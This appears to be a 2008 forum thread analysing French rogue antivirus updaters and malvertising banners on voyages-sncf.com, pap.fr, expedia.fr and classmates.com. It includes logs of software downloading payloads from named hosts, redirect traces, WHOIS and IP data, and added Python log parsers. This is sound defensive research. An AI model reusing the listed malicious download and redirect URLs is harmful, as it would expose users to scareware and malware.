Sat Mar 15 20:19:12 2008    Sending request:  http://gratuit.restauration.menacecontrole.com/?proto=3&rc=UGA6PV-0001-8882-7773&v=2.2.362.4&abbr=UGA6PV&platform=nt&os_version=5.1.2600.2.0&ac=AE31D73B-2A52-4A4C-85FC-3C88A71F5DC6&appid=UGA6PV&em=&pcid=1830516028
Sat Mar 15 20:19:51 2008    Engine is exiting with return code of 24.
Sat Mar 15 20:19:51 2008    SCNS window is about to show, URL:
Sat Mar 15 20:19:51 2008    http://b2adz.com/?aid=ippuga6pv&msgid=639&acid=&
Sat Mar 15 20:20:22 2008    Downloading from SCNS started "http://bsa.safetydownload.com/chasseurdeserreures.com/ChasseurDesErreures/setup_fr.exe" -> "C:\DOCUME~1\KLY\LOCALS~1\Temp\setup_fr.exe"
Sat Mar 15 20:20:36 2008    Downloading from SCNS returned: 1
Sat Mar 15 20:20:36 2008    SCNS window is closed.
Sat Mar 15 20:20:37 2008    *******     Updater engine finished     *******
Sat Mar 15 20:09:14 2008        
Sat Mar 15 20:30:37 2008    *******     Updater engine started     *******
Sat Mar 15 20:30:37 2008    Command line is:
Sat Mar 15 20:30:37 2008    "C:\Program Files\MenaceControle\Up\gup.exe" update @ASupdater.dat -ProductVersion="@C:\Program Files\MenaceControle\Engines\AWBase\vbpv.dat" -Appearance=Normal -AppID=UGA6PV -IntegratedMode=1 -TaskID=0
Sat Mar 15 20:30:37 2008    Engine thread was started.
Sat Mar 15 20:30:38 2008    Processing variables file: C:\Program Files\MenaceControle\Up\updater.dat
Sat Mar 15 20:30:39 2008    Processing variables file: C:\Program Files\MenaceControle\Up\ASupdater.dat
Sat Mar 15 20:30:39 2008    Warning: couldn't read OID from #HKLM\SOFTWARE\MenaceControle\OID
Sat Mar 15 20:30:39 2008    Warning: couldn't read Suspicious from #HKLM\SOFTWARE\MenaceControle\Suspicious
Sat Mar 15 20:30:39 2008    Warning: couldn't read CustomerEmail from #HKLM\Software\MenaceControle\CustomerEmail
Sat Mar 15 20:30:39 2008    Sending request:  http://gratuit.restauration.menacecontrole.com/?proto=3&rc=WAS-0001-0002-0003&v=99.3.3.185&abbr=WAS&platform=nt&os_version=5.1.2600.2.0&ac=AE31D73B-2A52-4A4C-85FC-3C88A71F5DC6&appid=UGA6PV&em=&pcid=1830516028
Sat Mar 15 20:31:03 2008    Engine is exiting with return code of 24.
Sat Mar 15 20:31:03 2008    *******     Updater engine finished     *******
Sat Mar 15 20:31:03 2008        
Sat Mar 15 20:43:54 2008    *******     Updater engine started     *******
Sat Mar 15 20:43:54 2008      
Sat Mar 15 20:43:54 2008    Command line is:
Sat Mar 15 20:43:54 2008    "C:\Program Files\MenaceControle\Up\gup.exe" update  -ProductVersion="@C:\Program Files\MenaceControle\Dat\pv.dat" -Appearance=Normal -AppID=UGA6PV -IntegratedMode=1 -TaskID=0 -TaskID=0
Sat Mar 15 20:43:54 2008    Engine thread was started.
Sat Mar 15 20:43:55 2008    Processing variables file: C:\Program Files\MenaceControle\Up\updater.dat
Sat Mar 15 20:43:55 2008    Sending request:  http://gratuit.restauration.menacecontrole.com/?proto=3&rc=UGA6PV-0001-8882-7773&v=2.2.362.4&abbr=UGA6PV&platform=nt&os_version=5.1.2600.2.0&ac=AE31D73B-2A52-4A4C-85FC-3C88A71F5DC6&appid=UGA6PV&em=&pcid=1830516028
Sat Mar 15 20:44:02 2008    Engine is exiting with return code of 24.
Sat Mar 15 20:44:02 2008    SCNS window is about to show, URL:
Sat Mar 15 20:44:02 2008    http://b2adz.com/?aid=ippuga6pv&msgid=639&acid=&
Sat Mar 15 20:45:14 2008    Downloading from SCNS started "http://bsa.safetydownload.com/utilisateursur.com/UtilisateurSur/setup_fr.exe" -> "C:\DOCUME~1\KLY\LOCALS~1\Temp\setup_fr.exe"
Sat Mar 15 20:45:21 2008    Downloading from SCNS returned: 1
Sat Mar 15 20:45:21 2008    SCNS window is closed.
Sat Mar 15 20:45:22 2008    *******     Updater engine finished     *******

Illustrated, that gives:
  • Update module is launched.
  • Internet access is requested.
  • Application server is contacted. If a "message" is available, the website mentioned next to Text is contacted.
  • User is redirected to "the fake alert site".
  • Fake alert is displayed and the setup file is downloaded.
Another rogue application, Virus Effaceur, has a strange behavior too: it keeps pinging several sites, as seen in the log below.

CODE
Fri Mar 14 18:29:40 2008    Diagnostic report begin.
Fri Mar 14 18:29:41 2008    Resolving hostname yahoo.com: 207.68.172.246
Fri Mar 14 18:29:41 2008    Resolving hostname msn.com: 207.68.172.246
Fri Mar 14 18:29:41 2008    Pinging 216.109.112.135: response code 0 from 216.109.112.135 after 200 milliseconds.
Fri Mar 14 18:29:41 2008    Pinging 216.109.112.135: response code 0 from 216.109.112.135 after 201 milliseconds.
Fri Mar 14 18:29:41 2008    Pinging 216.109.112.135: response code 0 from 216.109.112.135 after 180 milliseconds.
Fri Mar 14 18:29:41 2008    Pinging 216.109.112.135: response code 0 from 216.109.112.135 after 220 milliseconds.
Fri Mar 14 18:29:44 2008    Pinging 216.239.37.99: request timed out.
Fri Mar 14 18:29:44 2008    Pinging 207.68.172.246: request timed out.
Fri Mar 14 18:29:47 2008    Pinging 216.239.37.99: request timed out.
Fri Mar 14 18:29:47 2008    Pinging 207.68.172.246: request timed out.
Fri Mar 14 18:29:50 2008    Pinging 216.239.37.99: request timed out.
Fri Mar 14 18:29:50 2008    Pinging 207.68.172.246: request timed out.
Fri Mar 14 18:29:53 2008    Pinging 216.239.37.99: request timed out.
Fri Mar 14 18:29:53 2008    Pinging 207.68.172.246: request timed out.
Fri Mar 14 18:29:56 2008    Pinging 216.239.37.99: request timed out.
Fri Mar 14 18:29:59 2008    Pinging 207.68.172.246: request timed out.
Fri Mar 14 18:29:59 2008    End diagnostic report

Maybe I wasn't lucky enough to get the xml files, but at least I got a few new IPs. I will post them later on.
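The updater logs above, and the illustrated sequence that follows them, can be reduced to a timeline by a small parser. Added example, not code from the original post or from any of the rogue products: it understands both log layouts quoted above (with and without the GUID prefix), extracts the update request, the SCNS window URL and the download source and destination, lists the hosts contacted in order, and collects the identifier parameters (pcid, ac) from the update requests; the sample log is constructed from lines of the two logs quoted above.

```python
import re
from dataclasses import dataclass
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Constructed sample: lines copied from the first two updater logs quoted
# above (Advanced Cleaner, then the GUID-prefixed sysdepannage log).
SAMPLE_LOG = r"""
Sat Mar 15 19:05:11 2008    *******     Updater engine started     *******
Sat Mar 15 19:05:11 2008    Sending request:  http://trial.advancedcleaner.com/?proto=3&rc=UADCFR-0001-8882-7773&v=1.0.52.2&abbr=UADCFR&platform=nt&os_version=5.1.2600.2.0&ac=8587ba19-add1-476e-8a60-a8bd7ffa737e&appid=UADC&em=&pcid=1830516028
Sat Mar 15 19:05:17 2008    Engine is exiting with return code of 24.
Sat Mar 15 19:05:17 2008    SCNS window is about to show, URL:
Sat Mar 15 19:05:17 2008    http://errclean.com/.scns/?p=10&aid=scnsuadc&lid=ges0001_10&msgid=503&acid=&
Sat Mar 15 19:10:11 2008    Downloading from SCNS started "http://bsa.safetydownload.com/sysdepannage.com/SysDepannage/setup_fr.exe" -> "C:\DOCUME~1\KLY\LOCALS~1\Temp\setup_fr.exe"
Sat Mar 15 19:10:25 2008    Downloading from SCNS returned: 1
Sat Mar 15 19:10:25 2008    *******     Updater engine finished     *******
Sat Mar 15 19:47:52 2008    {2B402670-9286-4DAB-AE5B-B513E7492A26}    Sending request:  http://uptrial.sysdepannage.com/?proto=3&rc=UGESV-0001-7772-8883&v=1.4.9.0&abbr=UGESV&platform=nt&os_version=5.1.2600.2.0&ac=EC9F078C-7BA9-4BF6-9959-37EA60C11568&em=&pcid=1830516028&sai=scnsuadc_mrt_0_fr_fr&sli=ges0001v_10&saf=&cnt=fr&lng=&tid=0001&nud=0
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} [A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4})\s+"
    r"(?:\{[0-9A-Fa-f-]+\}\s+)?"   # optional per-instance GUID (second log above)
    r"(?P<msg>.*)$"
)
REQUEST_RE = re.compile(r"^Sending request:\s+(?P<url>\S+)")
DOWNLOAD_RE = re.compile(
    r'^Downloading from SCNS started "(?P<src>[^"]+)" -> "(?P<dst>[^"]+)"'
)


@dataclass
class Event:
    """One network action recorded by the rogue's updater."""
    time: datetime
    kind: str        # "update_request", "scns_window" or "download"
    url: str
    dest: str = ""   # local path, download events only

    @property
    def host(self):
        return urlsplit(self.url).hostname or ""


def parse_updater_log(text):
    """Turn updater log text into a list of Event objects.

    "SCNS window is about to show, URL:" is followed by the URL on the
    next line, so that expectation is carried across one line.
    """
    events, expect_scns_url = [], False
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
        msg = m["msg"].strip()
        if expect_scns_url:
            expect_scns_url = False
            if msg.startswith("http"):
                events.append(Event(ts, "scns_window", msg))
                continue
        req, dl = REQUEST_RE.match(msg), DOWNLOAD_RE.match(msg)
        if req:
            events.append(Event(ts, "update_request", req["url"]))
        elif msg.startswith("SCNS window is about to show"):
            expect_scns_url = True
        elif dl:
            events.append(Event(ts, "download", dl["src"], dl["dst"]))
    return events


def contacted_hosts(events):
    """Hosts in first-contact order: the indicators to block or alert on."""
    hosts = []
    for e in events:
        if e.host and e.host not in hosts:
            hosts.append(e.host)
    return hosts


def machine_ids(events, params=("pcid", "ac")):
    """Values of identifier parameters sent in update requests.

    The same pcid value appears in every updater log quoted on this page,
    whichever product wrote it.
    """
    found = {p: set() for p in params}
    for e in events:
        if e.kind == "update_request":
            query = parse_qs(urlsplit(e.url).query)
            for p in params:
                found[p].update(query.get(p, []))
    return found
```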
Kimberly
<h4>
Errclean.com - 67.55.81.200
</h4>
Server Type: nginx/0.5.32
IP Location - New York - Jericho - Webair Internet Development Inc
Registrant:
Errclean Inc
1425 Marine Drive, 205
Montreal, V7T 1B9
BM

Domain name: ERRCLEAN.COM

Administrative Contact:
Pollack, Sam voidupdates.com(at)googlemail.com
1425 Marine Drive, 205
Montreal, V7T 1B9
BM
2951001
Technical Contact:
Pollack, Sam voidupdates.com(at)googlemail.com
1425 Marine Drive, 205
Montreal, V7T 1B9
BM
2951001

Registrar of Record: TUCOWS, INC.
Record last updated on 18-Feb-2008.
Record expires on 14-Jun-2009.
Record created on 14-Jun-2006.

Registrar Domain Name Help Center:
http://domainhelp.tucows.com

Domain servers in listed order:
NS4.ERRCLEAN.COM 77.73.98.4
NS1.ERRCLEAN.COM 208.79.82.50
NS2.ERRCLEAN.COM 208.79.82.66
NS3.ERRCLEAN.COM 77.73.98.2

Websites.
<h4>
B2adz.com - 76.74.249.30
</h4>
Server Type: lighttpd/1.4.13
IP Location - Texas - San Antonio - Serverbeach

shares the same IP as waytotheprofit.com, blessedads.com, prevedmarketing.com, luckyadsols.com ....

<h4>
archive.easydownloadsoft.com - 66.244.254.201 & 66.244.254.239
</h4>
66.244.254.201
  1. archive.easydownloadsoft.com A
  2. bsa.safetydownload.com CNAME
  3. content.onerateld.com A
  4. sec.storageguardsoft.com A
  5. software.protectdownloads.com CNAME
66.244.254.239
  1. archive.easydownloadsoft.com A
  2. box239.yyz1.setupahost.net PTR A
  3. bsa.safetydownload.com CNAME
  4. content.onerateld.com A
  5. sec.storageguardsoft.com A
  6. software.protectdownloads.com CNAME
<h4>
Miscellaneous IP blocks
</h4>
safe.sysdepannage.com - 67.55.81.167
sysdepannage.com - 67.55.81.200
http://www.robtex.com/cnet/67.55.81.html

pixel.safetydownload.com - 85.12.60.20
pixel1.onerateld.com - 85.12.60.20
enregistrer.menacecontrole.com - 85.12.60.60
http://www.robtex.com/cnet/85.12.60.html

advancedcleaner.com - 85.17.4.103
inscan.fr.advancedcleaner.com - 85.17.4.104
gregistre.menacecontrole.com - 85.17.4.104
reglog.sysdepannage.com - 85.17.4.104
http://www.robtex.com/cnet/85.17.4.html

trial.advancedcleaner.com - 85.17.4.152
http://www.robtex.com/dns/trial.advancedcleaner.com.html

sale.antispywaremaster.com - 85.234.134.125
http://www.robtex.com/dns/sale.antispywaremaster.com.html

antispywaremaster.com - 87.117.252.11
http://www.robtex.com/ip/87.117.252.11.html

uptrial.sysdepannage.com - 87.117.255.35
http://www.robtex.com/dns/uptrial.sysdepannage.com.html
http://www.robtex.com/cnet/87.117.255.html

gratuit.restauration.menacecontrole.com - 89.18.181.22
http://www.robtex.com/dns/gratuit.restaura...ntrole.com.html

vente.menacecontrole.com - 89.18.181.38
menacecontrole.com - 89.18.181.100
http://www.robtex.com/cnet/89.18.181.html
Kimberly
<h4>
www.voyages-sncf.com
</h4>
A malicious advertising banner was reported on www.voyages-sncf.com yesterday evening here.

Banner.

medias.voyages-sncf.com/0/VSC/yourmusic-bmgdirect-mar08-ban//yourmusic_468x60.swf
The malicious SWF is hosted on their own servers. Yourmusic banners have been seen on other websites in the past.

Redirects.

station-appraisals.com/c/index.php?id=TGVwWjgwV29vcWdVVWlxRk8wNDRoPTEyMDQ2NTE3MjcmcG56Y252dGE9cWJjYmm7NkiZmdm95bAYNkiDgNmYNkiDgNm

waytotheprofit.com/?cmpid=dopossibly
Screenshots in situ.

Since I was using my English VM, I got redirected to scanner2.malware-scan.com

Once the page loaded, I also got an alert to install Spy-shredder. Let's call that 2 for the same "price".

Leaving the site, I still got prompted to download the software.

Closing the window yielded a download window.

Trace log with referers.
CODE
GET /0/VSC/yourmusic-bmgdirect-mar08-ban//yourmusic_468x60.swf HTTP/1.1
Accept: */*
Referer: http://www.voyages-sncf.com/daily/deals/vsc/promotion_train/train_paris_turin.html?rfrr=Homepage_ColonneC_D%C3%A9couvrez%20le%20Pi%C3%A9mont
x-flash-version: 9,0,47,0
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: medias.voyages-sncf.com
Connection: Keep-Alive
Cookie: MC1=GUID=C073D9D07FFB49F59CD12C6596E33C84; RMID=56cae9fe47de9f80; RMFD=011JbIQHO101AHv|O101B4O; RMFW=011JbIQH7101Am5|7101BRs; s_cc=true; s_sq=voyagessncfcomprod%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.voyages-sncf.com/daily/deals/vsc/promotion_train/train_paris_turin.html%25253Frfrr%25253DHomepage_Col%2526ot%253DA%2526oi%253D1027; s_vi=[CS]v1|47DE9F9200000CB6-A140C6100003176[CE]

HTTP/1.1 200 OK
Date: Mon, 17 Mar 2008 16:45:13 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Last-Modified: Wed, 05 Mar 2008 17:50:12 GMT
ETag: "747e6-34ca-47cedd54"
Accept-Ranges: bytes
Content-Length: 13514
Connection: close
Content-Type: application/x-shockwave-flash

The infamous crossdomain.xml was the next link.
CODE
GET /crossdomain.xml HTTP/1.1
Accept: */*
x-flash-version: 9,0,47,0
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: station-appraisals.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/0.4.13
Date: Mon, 17 Mar 2008 17:51:58 GMT
Content-Type: text/xml
Connection: close
Content-Length: 99
Last-Modified: Mon, 17 Dec 2007 12:24:07 GMT
Accept-Ranges: bytes
<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

Here we clearly see medias.voyages-sncf.com/0/VSC/yourmusic-bmgdirect-mar08-ban//yourmusic_468x60.swf in the HTTP referer header.
CODE
GET /c/index.php?id=TGVwWjgwV29vcWdVVWlxRk8wNDRoPTEyMDQ2NTE3MjcmcG56Y252dGE9cWJjYmm7NkiZmdm95bAYNkiDgNmYNkiDgNm HTTP/1.1
Accept: */*
Referer: http://medias.voyages-sncf.com/0/VSC/yourmusic-bmgdirect-mar08-ban//yourmusic_468x60.swf
x-flash-version: 9,0,47,0
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: station-appraisals.com
Connection: Keep-Alive

Next location is waytotheprofit.com with the campaign name as a parameter. The web page contains a redirect to prevedmarketing.com.
CODE
GET /?cmpid=dopossibly HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: waytotheprofit.com
Connection: Keep-Alive

HTTP/1.1 302 Found
X-Powered-By: PHP/5.2.0-8+etch10
Set-Cookie: gI=YTo1OntzOjEyOiJjb3VudHJ5X2NvZGUiO3M6MjoiRlIiO3M6NzoiY291bnRyeSI7czo2OiJmcmFuY2UiO3M6NToic3RhdGUiO3M6MjQ6InByb3ZlbmNlLWFscGVzLWNvdGVkJ3p1ciI7czo0OiJjaXR5IjtzOjQ6Im5pY2UiO3M6MTE6ImNvdW50cnlfYWJyIjtzOjM6IkZSQSI7fQ%3D%3D; expires=Tue, 17-Mar-2009 16:45:19 GMT; path=/; domain=.adnetserver.com
Set-Cookie: gI=YTo1OntzOjEyOiJjb3VudHJ5X2NvZGUiO3M6MjoiRlIiO3M6NzoiY291bnRyeSI7czo2OiJmcmFuY2UiO3M6NToic3RhdGUiO3M6MjQ6InByb3ZlbmNlLWFscGVzLWNvdGVkJ3p1ciI7czo0OiJjaXR5IjtzOjQ6Im5pY2UiO3M6MTE6ImNvdW50cnlfYWJyIjtzOjM6IkZSQSI7fQ%3D%3D; expires=Tue, 17-Mar-2009 16:45:19 GMT; path=/; domain=.adnetserver.com
Location: http://prevedmarketing.com/?tmn=mwatmp&aid=dopossibly&lid=&ax=1&ed=2&mt_info=5694_6106_2358
Content-type: text/html
Content-Length: 0
Date: Mon, 17 Mar 2008 16:45:19 GMT
Server: lighttpd/1.4.13

From prevedmarketing.com we are redirected to scanner2.malware-scan.com.
CODE
GET /?tmn=mwatmp&aid=dopossibly&lid=&ax=1&ed=2&mt_info=5694_6106_2358 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: prevedmarketing.com
Connection: Keep-Alive

HTTP/1.1 302 Found
X-Powered-By: PHP/5.2.0-8+etch10
Set-Cookie: gI=YTo1OntzOjEyOiJjb3VudHJ5X2NvZGUiO3M6MjoiRlIiO3M6NzoiY291bnRyeSI7czo2OiJmcmFuY2UiO3M6NToic3RhdGUiO3M6MjQ6InByb3ZlbmNlLWFscGVzLWNvdGVkJ3p1ciI7czo0OiJjaXR5IjtzOjQ6Im5pY2UiO3M6MTE6ImNvdW50cnlfYWJyIjtzOjM6IkZSQSI7fQ%3D%3D; expires=Tue, 17-Mar-2009 16:45:23 GMT; path=/; domain=.adnetserver.com
Set-Cookie: gI=YTo1OntzOjEyOiJjb3VudHJ5X2NvZGUiO3M6MjoiRlIiO3M6NzoiY291bnRyeSI7czo2OiJmcmFuY2UiO3M6NToic3RhdGUiO3M6MjQ6InByb3ZlbmNlLWFscGVzLWNvdGVkJ3p1ciI7czo0OiJjaXR5IjtzOjQ6Im5pY2UiO3M6MTE6ImNvdW50cnlfYWJyIjtzOjM6IkZSQSI7fQ%3D%3D; expires=Tue, 17-Mar-2009 16:45:23 GMT; path=/; domain=.adnetserver.com
Location: http://scanner2.malware-scan.com/14_swp/?tmn=null&aid=dopossibly_ma14s_mb1t&lid=&affid=&ax=1&ed=2&mt_info=5694_6106_2358:3958_0_15358
Content-type: text/html
Content-Length: 0
Date: Mon, 17 Mar 2008 16:45:23 GMT
Server: lighttpd/1.4.13

Details will be forwarded to www.voyages-sncf.com in the next minutes.
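The redirect chain walked through above can be reconstructed mechanically from a trace in this format. Added example, not code from the original post: it parses the blank-line separated request/response pairs, links each 302 Location to the request that follows, and reports the hosts in the order the browser reached them together with the Referer that started the chain; the sample trace is condensed from the exchanges quoted above (the /c/index.php id is shortened and most headers are dropped).

```python
import re
from urllib.parse import urlsplit

# Constructed sample condensed from the trace quoted above: most headers and
# the redacted "~~~" lines are dropped and the /c/index.php id is shortened.
SAMPLE_TRACE = """\
GET /c/index.php?id=TGVwWjgwV29v HTTP/1.1
Referer: http://medias.voyages-sncf.com/0/VSC/yourmusic-bmgdirect-mar08-ban//yourmusic_468x60.swf
x-flash-version: 9,0,47,0
Host: station-appraisals.com

GET /?cmpid=dopossibly HTTP/1.1
Host: waytotheprofit.com

HTTP/1.1 302 Found
Location: http://prevedmarketing.com/?tmn=mwatmp&aid=dopossibly&lid=&ax=1&ed=2&mt_info=5694_6106_2358
Content-Length: 0

GET /?tmn=mwatmp&aid=dopossibly&lid=&ax=1&ed=2&mt_info=5694_6106_2358 HTTP/1.1
Host: prevedmarketing.com

HTTP/1.1 302 Found
Location: http://scanner2.malware-scan.com/14_swp/?tmn=null&aid=dopossibly_ma14s_mb1t&lid=&affid=&ax=1&ed=2&mt_info=5694_6106_2358:3958_0_15358
Content-Length: 0
"""

REQUEST_RE = re.compile(r"^[A-Z]+ (\S+) HTTP/\d\.\d$")
STATUS_RE = re.compile(r"^HTTP/\d\.\d (\d{3})")


def parse_messages(text):
    """Split a blank-line separated trace into (start_line, headers) pairs.

    Header names are lower-cased. Lines without a name:value shape (such as
    a response body) are skipped.
    """
    messages = []
    for block in re.split(r"\n[ \t]*\n", text.strip()):
        lines = block.splitlines()
        headers = {}
        for line in lines[1:]:
            name, sep, value = line.partition(":")
            if sep and name.strip():
                headers[name.strip().lower()] = value.strip()
        messages.append((lines[0].strip(), headers))
    return messages


def reconstruct_chain(text):
    """Pair each request with its response and return the hops in order.

    Each hop is a dict with url (scheme assumed http, as in the capture),
    referer, status and location; status stays 0 when no reply was captured.
    """
    hops, open_hop = [], None
    for start, headers in parse_messages(text):
        req, status = REQUEST_RE.match(start), STATUS_RE.match(start)
        if req:
            open_hop = {"url": "http://" + headers.get("host", "") + req.group(1),
                        "referer": headers.get("referer", ""),
                        "status": 0, "location": ""}
            hops.append(open_hop)
        elif status and open_hop is not None:
            open_hop["status"] = int(status.group(1))
            open_hop["location"] = headers.get("location", "")
            open_hop = None
    return hops


def chain_hosts(hops):
    """Hosts in the order the browser reached them, final Location included."""
    hosts = []
    for h in hops:
        for url in (h["url"], h["location"]):
            name = urlsplit(url).hostname if url else None
            if name and name not in hosts:
                hosts.append(name)
    return hosts


def swf_origin(hops):
    """First Referer in the chain: the creative that kicked it off."""
    return next((h["referer"] for h in hops if h["referer"]), "")


def broken_links(hops):
    """Indices of redirecting hops whose Location is not the next request.

    An empty list means the capture is complete: every 302 was followed by
    exactly the request it pointed at.
    """
    return [i for i, h in enumerate(hops[:-1])
            if h["location"] and hops[i + 1]["url"] != h["location"]]
```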
Kimberly
Some interesting information thanks to MAD.

On Mar 17 2008, we found the banner below.
medias.voyages-sncf.com/0/VSC/yourmusic-bmgdirect-mar08-ban//yourmusic_468x60.swf
There are 2 other yourmusic banners on the loose which have of course the same redirects.

realmedia.pap.fr/0/VSC/yourmusic-bmgdirect-mar08-ban/yourmusic_468x60.swf
stream.expedia.fr/0/VSC/yourmusic-bmgdirect-mar08-ban//yourmusic_468x60.swf
______________________________

The interesting part is the IP where all these banners are hosted.

212.113.31.48

canonical name eur56deliv.247realmedia.com.
aliases stream.expedia.fr
oas000575.247realmedia.com

canonical name eur56deliv.247realmedia.com.
aliases medias.voyages-sncf.com
oas000551.247realmedia.com

canonical name eur56deliv.247realmedia.com.
aliases realmedia.pap.fr
oas000459.247realmedia.com

Robtex information.

212.113.31.32-212.113.31.63 REALMEDIA-UK Real Media London

hostnames sharing ip with a-records.
  • eur56deliv.247realmedia.com
hostnames sharing ip indirectly via cnames.
  • ads-nc.rmuk.co.uk
  • ads-secure.rmuk.co.uk
  • medias.voyages-sncf.com
  • multi1.rmuk.co.uk
  • oas-eu.247realmedia.com
  • pubca.cvf.fr
______________________________

Seeing a banner being hosted at stream.expedia.fr, it's fairly reasonable to presume that visitors of Expedia.fr will be hit by the advertisement. Expedia.com was already the victim of a malicious banner during the period of Jan 29 2008.

I'll try to get in touch with RealMedia to get them removed. The SNCF hasn't replied to any of my requests either.
______________________________

Update 6:30 AM

www.pap.fr - a French real estate website - gets its banners from realmedia.pap.fr. An English version of the website is also available. With around 7.128.693 visits / month, a lot of people could be the victim of redirects when visiting the website.

Sandi has alerted her contacts and blogged the incidents too in the meantime.
http://msmvps.com/blogs/spywaresucks/archi...21/1549124.aspx
Kimberly
I've just checked back on the 3 banners. From what I can see they have been neutralized about 2 hours ago. Internet Explorer is showing a blank page and the file is only 25 bytes in size. Only the header remains. Probably done on purpose in order not to break the links on the websites.

Kimberly
<h4>
www.classmates.com
</h4>
A very bad weekend for classmates.com: 3 active banners were discovered on their site. The following URLs are involved:

iexplorer-security.org/?id=624400105
fastwebway.com/soft.php?aid=011807&d=1&product=XPA
xponlinescanner.com/2008/1/freescan.php?aid=77011807
The full story can be read here. The information about Gemini Interactive is very interesting but I got curious about another domain because of something Sandi said:

QUOTE
I think I know, now, why I have received several complaints about malicious banner advertisements in association with Juno.

The banners are hosted on nztv.prod.untd.com and nztv.prod.untd.com is hosted on a Juno Block.

<h4>
nztv.prod.untd.com - 64.136.44.21
</h4>
64.136.0.0-64.136.63.255 JUNO-BLK
64.136.44.0/22 UOL DCA Block
13446 UNSPECIFIED Primary AS for United Online

People who know me a little bit know that I love to dig up stuff.

Let's do a Google search on nztv.prod.untd.com and see if we can find something. Page 2 on Google Search caught my attention because of the word Getfreecar in a flash link. Back in January we did indeed find gnida.swf on getfreecar.com. See Post#9.
Will we be lucky or not ... yep very lucky. The advertisement is still active as seen below.
It looks like the page is not very well written, because we see a part of the website's code. It also reveals that these redirects have been going on since at least November 2006 - see the mention 728x90_Getfreecar_Nov06.html.html. The banner is malicious; the redirects seen in Ethereal did prove it. The link keeps bouncing on getfreecar.com and almost "kills" your internet connection. The website only shows a blank page with stats=251643485. I fear this represents the number of people being redirected.
IPB Image
CODE
GET /crossdomain.xml HTTP/1.1
Accept: */*
x-flash-version: 9,0,47,0
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
If-Modified-Since: Mon, 17 Dec 2007 12:31:49 GMT
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: getfreecar.com
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Server: nginx/0.4.13
Date: Sun, 23 Mar 2008 17:28:20 GMT
Last-Modified: Mon, 17 Dec 2007 12:31:49 GMT
Connection: keep-alive

GET /stats.php?campaign=unlu3001&u=1163187596333 HTTP/1.1
Accept: */*
Referer: http://nztv.prod.untd.com/RealMedia/ads/Creatives/ISP/MWS_Getfreecar_LBLINT_2_8671/gfc_728x90.swf?clickTAG=http://cyclops.prod.untd.com/Real
x-flash-version: 9,0,47,0
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: getfreecar.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/0.4.13
Date: Sun, 23 Mar 2008 17:28:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.0-8+etch10
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 23 Mar 2008 17:28:20 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache

f
stats=251643485
0

Banner.
nztv.prod.untd.com/RealMedia/ads/Creatives/ISP/MWS_Getfreecar_LBLINT_2_8671/gfc_728x90.swf
Campaign.
getfreecar.com/stats.php?campaign=unlu3001&u=1163187596333
______________________________

They made a "revised" version of the advertisement on 6 March 2007.
IPB Image
I wanted to have a look at the banner and the scripts, so I opened the SWF file in Flash Decompiler Trillix. During playback, Flash Decompiler Trillix wanted to access Internet.
IPB Image
Another malicious banner as seen below ... Note the referer - Referer: file://C|\Documents and Settings\KLY\Desktop\getfreecar728x90_REVISED_07052006_unprotected.swf - it's really the file on my desktop.
IPB Image
CODE
GET /stats.php?campaign=union&u=1152354215430 HTTP/1.1
Accept: */*
Referer: file://C|\Documents and Settings\KLY\Desktop\getfreecar728x90_REVISED_07052006_unprotected.swf
x-flash-version: 9,0,47,0
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: getfreecar.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/0.4.13
Date: Sun, 23 Mar 2008 17:26:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.0-8+etch7
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 23 Mar 2008 17:26:21 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache

f
stats=139874997
0

I opened many SWF files with different tools and this is the first time I encountered this behavior.

Banner.
nztv.prod.untd.com/RealMedia/ads/Creatives/ISP/MWS_GetFreeCar_LBLINT_6_8671/getfreecar728x90_REVISED_07052006.swf
Campaign.
